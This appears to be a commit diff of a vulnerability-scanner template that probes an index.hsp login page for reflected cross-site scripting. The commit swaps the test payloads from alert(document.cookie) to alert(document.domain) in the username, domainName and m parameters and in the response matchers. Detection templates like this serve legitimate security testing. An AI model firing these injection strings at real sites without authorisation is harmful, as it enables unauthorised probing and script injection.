payload update
parent
d4a1db8b54
commit
c6168b1d23
|
@ -25,9 +25,9 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.cookie),//"
|
||||
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.cookie),//"
|
||||
- "{{BaseURL}}/index.hsp?m=',alert(document.cookie),'"
|
||||
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
|
||||
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
|
||||
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
|
@ -35,8 +35,8 @@ http:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\\\\'-alert(document.cookie),//"
|
||||
- "',alert(document.cookie),'"
|
||||
- "\\\\'-alert(document.domain),//"
|
||||
- "',alert(document.domain),'"
|
||||
condition: or
|
||||
|
||||
- type: dsl
|
||||
|
|
Loading…
Reference in New Issue